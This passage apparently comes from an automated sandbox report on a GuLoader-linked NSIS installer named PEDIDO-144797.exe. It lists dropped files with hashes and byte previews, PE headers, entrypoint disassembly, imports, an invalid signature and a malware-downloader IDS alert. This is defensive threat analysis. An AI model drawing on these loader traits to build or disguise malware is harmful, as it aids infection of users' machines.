                                                                                                                              LisectAVT_2403002A_41.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                LisectAVT_2403002A_41.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  Inventory_list.img.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    Inventory_list.img.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      sF2s1EQU7T.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\Users\user\AppData\Local\Temp\nshDBFA.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 128.000000
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1351482
                                                                                                                                        Entropy (8bit):3.8030631093315117
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:XUR9g6MjY8GxRAdKo0osUCB2EEwHDU0A0K:me9iksZDUrR
                                                                                                                                        MD5:8E04282016EA8D1111880479A030A8A6
                                                                                                                                        SHA1:059CCFFC09B8E61970C6EBDBCE89149A062391AC
                                                                                                                                        SHA-256:27872B886B7698DC8022D1C6778718078943618129B34243B01423CDAC666399
                                                                                                                                        SHA-512:1644DE47AD5EEBAC529A27DF4A9913B76BF59DFFFDC3D171D236001F4E314E66937924D39C808F6D5D610E40F17E4C292676A1FA6D387C439D22BE16A403301E
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:.9......,.......................`).......8......j9..........................................................................................................................................................................................................................................G...J...............j...............................................................................................................................U...............*.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):11776
                                                                                                                                        Entropy (8bit):5.659384359264642
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                                                                        MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                                                                        SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                                                                        SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                                                                        SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: rpedido-002297.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: rpedido-002297.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: FACTURA-002297.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: FACTURA-002297.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: LisectAVT_2403002A_41.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: LisectAVT_2403002A_41.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Inventory_list.img.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Inventory_list.img.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: sF2s1EQU7T.exe, Detection: malicious, Browse
                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Bugvggens\Fyrstendmmer186.Hje

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):195680
                                                                                                                                        Entropy (8bit):7.540352859140884
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:IDjEODVJUk6F2MnnHRmmMrpz65eXlpKF0Zo5Mj0IOsC8G5f4X:G/DTsRHd5eXlpA5Mjfg8GG
                                                                                                                                        MD5:9FD1449B3FE19BB534F0EB4492F90BCF
                                                                                                                                        SHA1:543398F96D8E44F2E6D84767EA7B63AFFF762CF4
                                                                                                                                        SHA-256:B4B4DD4D573FE0F78FADAD65AE104AEA7E7237414B0D7430691FE75D57243399
                                                                                                                                        SHA-512:BF74461BD40E2276170903A3D352A98C79EDB7F3DE1E1B2C220FAFFDBABD5744D3EF1DD2BBBA8C394F61937D9B6C477022CC54835F19D6CD84A554C7AFF2982A
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:..T..DD................'.vvv..................=.P...??.......+....''''....a..d..%..........................ss........k...............BBB....B.....X........'.........K.!!.r..........b......................;;..................o......4...^^^.....J........EEE......''.vv.........pp........~.00...........AA......).........Y.....k...............``......nn.......{..ww._.........I.....XXXX......sss.....K...........nnn..........8........99999.......^...1.........O.......(...>....................cc..............I....G.....Z.-.........ii..................................*........CC..X.99.[..........x...........~~~.+++...%..LLL.............T...........+++............U...........v...........OOO..............DDDDDD......M.......t.u.22................J..S.6.....g...............zz...........E.......J..................*...M..-....0....j.eee.......................!!.<............c......:...........................................p...9................................................S....$$$.~~........4...

                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\bushers.txt

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):523
                                                                                                                                        Entropy (8bit):4.30492942039079
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:nGy3qcf5opzE6vCdgLMc/Uqv7FE7KRbqYUH6uN0u8vM:GEpxoy6adY/UqvZEwbql6uNh
                                                                                                                                        MD5:B33890A43FB0F38B6DDF18C5BCEFE234
                                                                                                                                        SHA1:80ED178A92C2B5CB530AEE4673FFC9011EBF86BB
                                                                                                                                        SHA-256:3BF02F982A76A4C896FDA78C1C4B2B730D690DD86475213DC415269D4629407B
                                                                                                                                        SHA-512:169E2D067337BF05BA08D615CE61B28CA4FD93D204966B3386FB4B373D9BACD689BEE3DDC5E04A4F19586E585263F62BC40B0944A10E5867C63C9C7236A5CC48
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:clisiocampa percussing acronyctous petitesses pilgrimsrejser zygosphene miasmology konkyljens..labelable kraftls veneries symbolically duncan sulemadens,logopdisk genuinenesses pseudoinspirational bekenderen.franciscanism krftcellers drylots toksikologiskes rottegiftes impecuniary slisken autokratiets hjertebaandet banegaardsbygningen choenix..adrenocorticotropic mangfoldigheders avisudvikling ekstremitetens skamsloges nrede unpersuasion trachling tvrformatets..negerbolle suppressionen lustful bagels flamenco selrets,

                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi\Semolinas.Fit

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):454032
                                                                                                                                        Entropy (8bit):2.653031104800933
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:zjFc1Ku+6ADOlig8DEq4a/LERvjSJCphiN5zCPS63cNg6KW0E5hF/vnYXW2ngfMl:i1vAd6BqP0oheUCH3uK4DEEEhH
                                                                                                                                        MD5:0C22814BB5A9B974CE322212EF915A81
                                                                                                                                        SHA1:5B0BB3F2F3BA28D3026A9C0528A91E533993A5AD
                                                                                                                                        SHA-256:2C2E91A87B41D74F121D2EA5D92BFBA0C802028F297E32894C34A3DFB28FDC3A
                                                                                                                                        SHA-512:8A6DB227CEDEB8862910DEFCC64378BD0DE5C6A7EA9479E6BFC02419FF4883F15DE4F5560232196041CF732A3EFFE5E8AE2E7BEF1E7E0FB2CA3209C7AB07C769
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:00001C000000363600A8002700000000F40000D8D80000BE00002525250000E5E5E500E200000000000000B7B70000A2000A0000FE000086003A000032320000252525252500008181000004040400000000363600D500004E0022220000EE000000EA00000000000000008000000000BF00000000C400BF0000000000000068008300005E5E00A5A5A500006969000000B7B700C6000000ACACACAC0000000000000010101010100000000047000000686868680000005151007D0000000000006D0000003200000000E8E8009E9E9E9E9E000000000020200079790000000000000000A6A600FCFCFCFC00000202020200969600000000630000D4D4007D000000000000F500CDCDCDCDCDCD00D4D400130011111100DE0089000000003B3B3B3B000000E7E70000B700C9000061616100002D2D2D2D2D00000000000091919191006363008686006500000000E200000000000000E8E8002A0000BE00D80077000000000000400000EBEBEBEB0000B8B8B8B8B8B8B8000083838300CC0043005D0000A6A6A6A6000000BDBDBD0000000000007D00E1000F00AAAAAA00720000D8D8D8D8000028000000720000000000DD000400D500FDFDFD0000DA0000525200D4D400B6B6B600EB00E2E2E20042420000002A2A00010100000000DADADA0000D8D8D8006363007000B30000001616160000

                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi\meropidae.kej

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):276551
                                                                                                                                        Entropy (8bit):1.2459972317120458
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:q5eLWls2nEEvz9mAEPesDf7zRhfRKrtTgtOnumyYJBW+JAILJcqhOzwnasNP2r2J:q86nLDJnJuki2BaFsfRz
                                                                                                                                        MD5:0071DC51C79F0655F0BB77074D56B1D7
                                                                                                                                        SHA1:9617AE1434B07532BAAF39D69CF720C05B85E8F9
                                                                                                                                        SHA-256:0628FA8F44795D79D5B855E8387985E04D134E8B57FE4D57E663FBAED278DF89
                                                                                                                                        SHA-512:E2149E9F3B18DCB50E49EC51226D7A6BF3969E119B385410E80E431024B25A938C965C743D80C0C1D8A3820D0DDDA14464CAC75F73AE22F259B447264F8431BA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:........................................................#..................................................................................E........R...............................]......................W...\......O.........................................$9......4.............................;..........X........................Z........"..............................................................................;..........U.....................^.....................l.......................3...................~............u.........................................e......P..................................H..............................................................................2.........2.................>....................................................................................................................+.......z....................A..$.........................................................................................]........?..............................

                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi\plastron.ori

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):398154
                                                                                                                                        Entropy (8bit):1.2543435533086644
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:8IfJmHKeJzuGrd0myk0Ek5rFnJd62xZ9WEmaslkcO:8omHKAJR0T8axr
                                                                                                                                        MD5:7BA8E260D6477B4FD16DAE2D14EA4482
                                                                                                                                        SHA1:16873CB5BFBA899D4ED937603AA9980F119695D6
                                                                                                                                        SHA-256:C19F7B3F1A20E1529113EE69AA53DB6E124A51F03098E6FB6AF0E76037C85B8B
                                                                                                                                        SHA-512:ECAA786515C73B08A44C22FD48B205166611750EC633849823A88BBF95A675CA29FB7F22E652EFCFC055FC92F8381FC6276F4B732F91612A2385BF670131FFF2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...................z...................................................1........................................T.......r...........................'......................O..................|......P.................................0.....................................).......................l.............S..^......Z.........E.................................{.....................................................................................................................................................................$...........*................................................D........y....................................0..........|........m............................G.............Q...........>...s.......C...................................................".....................................................................+.......................L...6.......................................................................`.................................k.....................

                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.ini

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):37
                                                                                                                                        Entropy (8bit):4.046762824854522
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:lgov8fOMy:XHB
                                                                                                                                        MD5:CFDA8E6AADE7958F94A959BDB29CB209
                                                                                                                                        SHA1:59C459E105A7AF33D13A365F735E3CB7B8E5DDB0
                                                                                                                                        SHA-256:B4543E8AB4997934D2EDC7DE8A76A24B7C2CCB641212AE3B9B17FE05B71D3E87
                                                                                                                                        SHA-512:EDFDCA00667ED3A5558F7E614373F0B8393763A979154666972C659CB44E75CCD51170E4E2189043046EB4DDB8A68642BBDB6F98A0E494E76E86FAAF14F993B2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:[xanthippe]..sikkerhedsgraden=preve..

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                        Entropy (8bit):7.21740383078352
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:PEDIDO-144797.exe
                                                                                                                                        File size:567'544 bytes
                                                                                                                                        MD5:2c5483106fe248cced82541b91cba20e
                                                                                                                                        SHA1:41e69017b26287ee7814bb35a967672ba58cb714
                                                                                                                                        SHA256:2702bb251c14965787b39f03a9c41000b9b0421528578e5a6a221ad8b27f182d
                                                                                                                                        SHA512:4ca40026e8dc3da75c7e68334d268d5b08f568259e597af1fabbd1586f4aaf05c716e17d0bf4c88b68f765fab6ead6965afd73ecb0ead8b97d3ea1fd55d60130
                                                                                                                                        SSDEEP:12288:4aqrw9z7Or5X16gS7U5XzJocC/Uisrk9qKyzpqK:5Kw9zar5lxYUtz2cC/lqVpqK
                                                                                                                                        TLSH:10C4DFAB2DD2CDEEC40746708AA5B5B1A6F2ACF187039A0367733BF92D32D514F06615
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:5ce633391c1c0601

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x403489
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9

                                                                                                                                        Authenticode Signature

                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:CN="binmen Aerophile ", E=Figurer@Midnoon.Fu, L=Whipsnade, S=England, C=GB
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 08/05/2024 04:06:26 08/05/2027 04:06:26
                                                                                                                                        Subject Chain
                                                                                                                                        • CN="binmen Aerophile ", E=Figurer@Midnoon.Fu, L=Whipsnade, S=England, C=GB
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:0B03CA7D5DFCDE8AC658D359B709A77C
                                                                                                                                        Thumbprint SHA-1:CCFFE8D8D5AAF536F8CD668FDBB76A2488B69D94
                                                                                                                                        Thumbprint SHA-256:4DE3D0A9755FF738FBB9D2F8683E6BCE15FB17DC42E63D71418B53798A25E6A4
                                                                                                                                        Serial:5C78EE42FBFBCE805443558BFD04290950A90037

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        sub esp, 000002D4h
                                                                                                                                        push ebx
                                                                                                                                        push esi
                                                                                                                                        push edi
                                                                                                                                        push 00000020h
                                                                                                                                        pop edi
                                                                                                                                        xor ebx, ebx
                                                                                                                                        push 00008001h
                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                        mov dword ptr [esp+10h], 0040A230h
                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                        call dword ptr [004080ACh]
                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                        cmp ax, 00000006h
                                                                                                                                        mov dword ptr [0042A24Ch], eax
                                                                                                                                        je 00007F72CCAD0743h
                                                                                                                                        push ebx
                                                                                                                                        call 00007F72CCAD39F1h
                                                                                                                                        cmp eax, ebx
                                                                                                                                        je 00007F72CCAD0739h
                                                                                                                                        push 00000C00h
                                                                                                                                        call eax
                                                                                                                                        mov esi, 004082B0h
                                                                                                                                        push esi
                                                                                                                                        call 00007F72CCAD396Bh
                                                                                                                                        push esi
                                                                                                                                        call dword ptr [00408150h]
                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                        jne 00007F72CCAD071Ch
                                                                                                                                        push 0000000Ah
                                                                                                                                        call 00007F72CCAD39C4h
                                                                                                                                        push 00000008h
                                                                                                                                        call 00007F72CCAD39BDh
                                                                                                                                        push 00000006h
                                                                                                                                        mov dword ptr [0042A244h], eax
                                                                                                                                        call 00007F72CCAD39B1h
                                                                                                                                        cmp eax, ebx
                                                                                                                                        je 00007F72CCAD0741h
                                                                                                                                        push 0000001Eh
                                                                                                                                        call eax
                                                                                                                                        test eax, eax
                                                                                                                                        je 00007F72CCAD0739h
                                                                                                                                        or byte ptr [0042A24Fh], 00000040h
                                                                                                                                        push ebp
                                                                                                                                        call dword ptr [00408044h]
                                                                                                                                        push ebx
                                                                                                                                        call dword ptr [004082A0h]
                                                                                                                                        mov dword ptr [0042A318h], eax
                                                                                                                                        push ebx
                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                        push 000002B4h
                                                                                                                                        push eax
                                                                                                                                        push ebx
                                                                                                                                        push 004216E8h
                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                        push 0040A384h

                                                                                                                                        Rich Headers

                                                                                                                                        Programming Language:
                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x220b8.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x896080x12f0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000x63d10x6400139645791b76bd6f7b8c4472edbbdfe5False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rdata0x80000x138e0x1400007eff248f0493620a3fd3f7cadc755bFalse0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0xa0000x203580x600ec5bcec782f43a3fb7e8dfbe0d0db4dbFalse0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .ndata0x2b0000x2c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .rsrc0x570000x220b80x2220030cc4d5ad2d805f600d8d9358a38829aFalse0.1827066163003663data2.9689436080399076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        RT_ICON0x572c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.14975452502070272
                                                                                                                                        RT_ICON0x67af00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.18344019339920117
                                                                                                                                        RT_ICON0x70f980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.21953235710911667
                                                                                                                                        RT_ICON0x751c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.2731327800829875
                                                                                                                                        RT_ICON0x777680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.3428705440900563
                                                                                                                                        RT_DIALOG0x788100x120dataEnglishUnited States0.5138888888888888
                                                                                                                                        RT_DIALOG0x789300x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                        RT_DIALOG0x78a500xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                        RT_DIALOG0x78b180x60dataEnglishUnited States0.7291666666666666
                                                                                                                                        RT_GROUP_ICON0x78b780x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                        RT_VERSION0x78bc80x1b0dataEnglishUnited States0.5601851851851852
                                                                                                                                        RT_MANIFEST0x78d780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States

                                                                                                                                        Network Behavior

                                                                                                                                        Suricata IDS Alerts

                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                        2024-10-04T10:50:43.162760+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049732142.251.40.206443TCP

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Oct 4, 2024 10:50:42.616579056 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.616679907 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:42.616904974 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.643475056 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.643517017 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:42.895818949 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:42.896049023 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.897382975 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:42.897641897 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.955472946 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.955573082 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:42.956748962 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:42.956950903 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:42.963362932 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:43.004363060 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.162919044 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.163104057 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:43.163177967 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.163341045 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:43.163353920 CEST44349732142.251.40.206192.168.11.20
